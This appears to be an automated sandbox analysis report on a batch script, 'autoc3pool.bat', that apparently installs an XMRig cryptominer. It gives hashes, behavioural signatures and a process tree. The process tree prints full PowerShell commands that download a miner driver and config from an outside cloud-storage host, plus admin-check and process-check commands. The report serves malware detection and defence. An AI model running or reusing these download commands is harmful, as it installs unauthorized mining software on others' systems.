Analysis
-
max time kernel
1s -
max time network
157s -
platform
windows10-1703_x64 -
resource
win10-20231215-en -
resource tags
arch:x64arch:x86image:win10-20231215-enlocale:en-usos:windows10-1703-x64system -
submitted
02-01-2024 09:44
Static task
static1
Behavioral task
behavioral1
Sample
autoc3pool.bat
Resource
win10-20231215-en
windows10-1703-x64
5 signatures
150 seconds
General
-
Target
autoc3pool.bat
-
Size
5KB
-
MD5
d28070074dab9fa5aceddb39ca45dc5d
-
SHA1
e268ed454e42a4286fbef29a41a368f3183c6a3e
-
SHA256
7a5c1b3504f8b7cc3807b63489be9f3c5629600f507f7ba2073ccf9cb93aa4d8
-
SHA512
b1f941a0af376483bea4c48e1ae6e7fac055d83873974de83f704dfabade5749d43082f013dd41eb1fab5b6cdc3ff483b52e6c93757925e82532e44d0883062f
-
SSDEEP
96:EAcjtsHKVDoHJyH+vHEdXGWcL+mKMVFLQqIr0yJ43T+Q3oUIg1RWS2QvSJFcHbTO:EVaqpopyevkhP6+mKoQfgO43V3odg1R+
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/WinRing0x64.sys
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/config.json
Signatures
-
Enumerates processes with tasklist 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 5052 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
tasklist.exepowershell.exedescription pid process Token: SeDebugPrivilege 4844 tasklist.exe Token: SeDebugPrivilege 5052 powershell.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
cmd.exenet.exedescription pid process target process PID 4924 wrote to memory of 4844 4924 cmd.exe tasklist.exe PID 4924 wrote to memory of 4844 4924 cmd.exe tasklist.exe PID 4924 wrote to memory of 4568 4924 cmd.exe find.exe PID 4924 wrote to memory of 4568 4924 cmd.exe find.exe PID 4924 wrote to memory of 4612 4924 cmd.exe net.exe PID 4924 wrote to memory of 4612 4924 cmd.exe net.exe PID 4612 wrote to memory of 664 4612 net.exe net1.exe PID 4612 wrote to memory of 664 4612 net.exe net1.exe PID 4924 wrote to memory of 5052 4924 cmd.exe powershell.exe PID 4924 wrote to memory of 5052 4924 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\autoc3pool.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4924 -
C:\Windows\system32\find.exefind /i "xmrig.exe"2⤵PID:4568
-
-
C:\Windows\system32\tasklist.exetasklist /fi "imagename eq xmrig.exe"2⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4844
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/WinRing0x64.sys', '9924\WinRing0x64.sys')"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5052
-
-
C:\Windows\system32\net.exenet session2⤵
- Suspicious use of WriteProcessMemory
PID:4612
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/config.json', '9924\config.json')"2⤵PID:2524
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session1⤵PID:664